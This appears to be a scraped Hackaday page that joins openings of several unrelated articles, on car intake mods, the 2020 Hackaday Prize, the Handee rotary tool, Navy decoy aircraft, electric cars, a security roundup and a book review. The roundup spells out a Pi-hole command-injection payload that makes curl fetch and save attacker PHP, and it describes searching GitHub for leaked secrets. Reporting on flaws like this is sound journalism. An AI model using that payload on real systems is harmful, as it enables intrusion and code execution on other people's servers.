While the car world is obsessed with everything boosted these days, many still yearn for the smooth power delivery and sonorous tone of a naturally aspirated engine. Of course, everyone still wants to go fast, so here’s how you go about getting more power out of your car without bolting on a big turbo or whining supercharger.
Intakes: This Can Get Pretty Invovled
A modified intake installed on a Honda S2000. Also referred to as “cold-air intakes”, they aim to suck in air at lower temperature which helps produce more power – hence the shield between the air filter and exhaust.
The intake is one of the first modifications made by many budding car enthusiasts. Throwing on a chromed intake pipe with a big pod filter was the mod to have back in the Fast and Furious era. Power gains can be had, though typically these are minor – on the order of 5-10 horsepower at most. It all depends on the car in question. A BMW M5 V10 was designed for high performance, with a highly advanced intake with individual throttle bodies from the factory. It’s unlikely any eBay parts are going to unlock horsepower that BMW’s engineers didn’t already find. Conversely, early Mazda Miatas are known to have a restrictive intake, largely due to the flap-type air flow meter. Replacing this with a freer-flowing setup has merit.
The 2020 Hackaday Prize begins right now. Our global engineering challenge seeks solutions to real-world problems. If you like to come up with creative solutions to tough problems, four non-profits can use your help. We need hackers, designers, and engineers throughout the world to work on designs for conservation, disaster relief, renewable resources, and assistive devices.
This is the seventh year of the Hackaday Prize, and like past years we want to see your ideas take shape, so share your design process in detail as a project page on Hackaday.io. Over $200,000 in prizes are at stake, with a $50,000 prize for the all around best solution which will then be designed for manufacture at Supplyframe’s DesignLab, produced in a limited run, and deployed in the field.
New this year is our partnership with non-profits that have each outlined challenges they are facing. Eight projects, one top finisher, and one runner up from each of the four categories of challenges, will receive $10,000 and $3,000 respectively. As with previous years, the bootstrap round offers some seed money for getting your prototype off the ground: up to $500 for each of the top twenty during early entry judging. There’s even a $5,000 wildcard prize for entries that don’t specifically address challenges from the four categories. Here’s a taste of the categories you can work on:
Develop solutions to combat invasive species in marine and island environments, and help craft tools for protecting our natural ocean landscapes
Low cost tools for use in the field like a heat sealers/welders, and medical devices like IV fluid warmers
Adaptive technologies for workstations like trackballs, joysticks, and large button controllers
Modular add-ons for earthen housing for connectivity, light, heating, and water storage
Albert Dremel developed the now famous rotary tool and started the company in 1932 to make blade sharpeners. It would be 1935 before the company produced the Moto-Tool which is mostly recognizable as an ancestor of the modern Dremel.
Dremel achieved such dominance that today the name is synonymous with rotary tools in the same way Xerox means photocopy and Crock-Pot is any slow cooker. Sure, there are knock offs you can get from the usual cheap tool outlets, but generally, people reach for a Dremel even when it isn’t really one. Today that tool might really be a Black and Decker or a Dewalt or even a cheap brand like Wen or Chicago Electric. But in the first half of the 20th century, you might have reached for a Handee.
A Whole Shop Full of Tools
The Handee was a product of the Chicago Wheel and Manufacturing Company who, in 1937, billed it as “a whole shop full of tools in one,” as you can see in this ad. While $10.75 might sound like a price for a Harbor Freight cheapie tool, adjusted for inflation that’s around $200 in 2020 money. At least for that price you got three free accessories out of the over 200 available.
I didn’t remember the Handee and I wanted to see if I could figure out what happened to it and the company who made it. After all, with the Internet at your disposal, how hard could it be? Turns out, I did learn a lot, but in the end, tracing down a company like this from the old days isn’t always as easy as you might think.
Air-to-air combat or “dogfighting” was once a very personal affair. Pilots of the First and Second World War had to get so close to land a hit with their guns that it wasn’t uncommon for altercations to end in a mid-air collision. But by the 1960s, guided missile technology had advanced to the point that a fighter could lock onto an enemy aircraft and fire before the target even came into visual range. The skill and experience of a pilot was no longer enough to guarantee the outcome of an engagement, and a new arms race was born.
An F-15 launching flare countermeasures.
Naturally, the move to guided weapons triggered the development of defensive countermeasures that could confuse them. If the missile is guided by radar, the target aircraft can eject a cloud of metallic strips known as chaff to overwhelm its targeting system. Heat-seeking missiles can be thrown off with a flare that burns hotter than the aircraft’s engine exhaust. Both techniques are simple, reliable, and have remained effective after more than a half-century of guided missile development.
But they aren’t perfect. The biggest problem is that both chaff and flares are a finite resource: once the aircraft has expended its stock, it’s left defenseless. They also only work for a limited amount of time, which makes timing their deployment absolutely critical. Automated dispensers can help ensure that the countermeasures are used as efficiently as possible, but sustained enemy fire could still deplete the aircraft’s defensive systems if given enough time.
In an effort to develop the ultimate in defensive countermeasures, the United States Navy has been working on a system that can project decoy aircraft in mid-air. Referred to as “Ghosts” in the recently published patent, several of these phantom aircraft could be generated for as long as the system has electrical power. History tells us that the proliferation of this technology will inevitably lead to the development of an even more sensitive guided missile, but in the meantime, it could give American aircraft a considerable advantage in any potential air-to-air engagements.
A while back, I sat in the newish electric car that was the pride and joy of a friend of mine, and had what was at the time an odd experience. Instead of getting in, turning the key, and driving off, the car instead had to boot up.
The feeling was of a piece of software rather than a piece of hardware, and there was a tangible wait before the start button could be pressed. It was a miracle of technology that could travel smoothly and quietly for all but the longest journeys I could possibly throw at it on relative pennies-worth of electricity, but I hated it. As a technologist and car enthusiast, I should be all over these types of motor vehicles. I live for new technology and I lust after its latest incarnations in many fields including automobiles.
I want my next car to have an electric motor, I want it to push the boundaries of what is capable with a battery and I want it to be an automotive tour de force. The switch to electric cars represents an opportunity like no other to deliver a new type of car that doesn’t carry the baggage of what has gone before, but in that car I saw a future in which they were going badly astray.
I don’t want my next vehicle to be a car like my friend’s one, and to understand why that is the case it’s worth going back a few decades to the cars my parents drove back when when jumpers were goalposts, and the home computer was just a gleam in the eye of a few long-haired outsiders in California.
Thunderspy was announced this week, developed by [Björn Ruytenberg]. A series of attacks on the Thunderbolt 3 protocol, Thunderspy is the next vulnerability in the style of Inception, PCILeech, and Thunderclap.
Inception and PCILeech were attacks on the naive Direct Memory Access (DMA) built into Firewire, Thunderbolt 1, and PCIe. A device could connect and request DMA over the link. Once granted, it could access the bottom four gigabytes of system memory, with both read and write access. It’s not hard to imagine how that would be a huge security problem, and it seems that this technique was in use by intelligence agencies at the time it was discovered. As an aside, the hardware DMA was entirely independent of software, so it was possible to debug a crashed kernel over firewire.
Once the vulnerability was made public, hardware and software vendors have taken steps to harden their systems against the attack. Thunderbolt 2 introduced security levels as a mitigation against the attacks. A user has to mark a device as trusted before DMA is offered to that device. Thunderclap exploited a series of vulnerabilities in how individual OSes interacted with those hardware mitigations.
Image by Björn Ruytenberg. Licensed under CC BY 4.0.
Now, Thunderspy abuses a series of problems in Intel’s Thunderbolt 3 specification and implementation. One interesting attack is cloning an already trusted Thunderbolt device. Plugging a Thunderbolt device into a Linux machine easily captures the device UUID. A malicious Thunderbolt device can be given that same UUID, and suddenly has the same level of trust as the cloned device.
[Björn] took the attack a step further, and discovered that he could disassemble a laptop or thunderbolt device, and read the firmware directly off the thunderbolt controller. That firmware can be modified and re-uploaded. One of the simplest attacks that enables is turning the security level to its lowest setting.
It’s interesting research, and there are fixes coming or already in place to mitigate the problems found. The real question is how much Thunderspy matters. The threat model is the evil maid: A laptop left in a motel room would be available to the cleaning staff for a few minutes. Thunderspy could potentially be used for this style of attack, but there are many other potentially better attack options. There is a narrow circumstance where Thunderspy is the perfect technique: A device with an encrypted drive, that’s been powered on and logged into, but locked. In this case, Thunderspy could be used to recover the drive encryption key stored in memory, and then used to plant malware.
That Time When Facebook Broke Everything
You may have noticed some widespread iOS application misbehavior on the 6th. Facebook introduced a change to the server component to their sign-on SDK, which caused many apps that made use of that SDK to crash. It’s worth asking if it’s a good idea for so many popular apps to use Facebook code. There doesn’t appear to have been a vulnerability or path to compromise other than the denial of service.
Large-scale WordPress attack
Nearly a million WordPress sites are under attack, in a campaign targeting a variety of vulnerabilities. The general attack strategy is to inject a malicious javscript that lays dormant until it’s executed by a site administrator. Ironically, logging in to your site to check it for compromise could be the trigger that leads to compromise. As always, keep your plugins up to date and follow the rest of the best practices.
Godaddy Breaches
Godaddy users were recently informed that there was a breach that exposed portions of their accounts to compromise. Notably, the compromise happened back in October of 2019, and wasn’t discovered for 6 months. Godaddy has stated that there wasn’t any evidence of any malicious action beyond the initial compromise, which is puzzling in itself.
On April 23, 2020, we identified SSH usernames and passwords had been compromised through an altered SSH file in our hosting environment. This affected approximately 28,000 customers. We immediately reset these usernames and passwords, removed the offending SSH file from our platform, and have no indication the threat actor used our customers’ credentials or modified any customer hosting accounts. To be clear, the threat actor did not have access to customers’ main GoDaddy accounts.
Pi-hole Exploit
A fun RCE exploit was discovered in the Pi-hole software. This particular problem requires authenticated access to the Pi-hole administrative web interface, so it’s not likely to cause too many problems on its own. Exploiting the flaw is simple, just set http://192.168.122.1#" -o fun.php -d " as the remote blocklist, with an IP that you control. Under the hood, the remote blocklist is fetched via curl, and the URL isn’t properly sanitized. Your PHP code is saved in the web directory, and an HTTP request triggers that code.
Leaking on Github
[Tillson Galloway] tells the story of how he made $10,000 in bug bounties, simply by searching Github for passwords and keys that shouldn’t be there. By searching for specific keywords, he found all sorts of interesting, unintentional things. vim_settings.xml contains recently copied and pasted strings, and .bash_history contains a record of commands that have been run. How many times have you accidentally typed a password in on the command line, thinking you were authenticating with SSH or sudo, just for an example? It’s an easy mistake to make, to accidentally include one of these hidden files in a public repository.
There have been examples of API keys accidentally included in source code drops, and even SSL certificates leaked this way over the years. It’s a lesson to all of us, make sure to sanitize projects before pushing code to Github.
For many of us, our passion for electronics and science originated with curiosity about some device, a computer, radio, or even a car. The subject of this book has just such an origin. However, how many of us made this discovery and pursued this path during times of hunger or outright famine?
That’s the remarkable story of William Kamkwamba that’s told in the book, The Boy Who Harnessed the Wind. Remarkable because it culminates with his building a windmill (more correctly called a wind turbine) that powered lights in his family’s house all by the young age of fifteen. As you’ll see, it’s also the story of an unyielding thirst for knowledge in the face of famine and doubt by others.
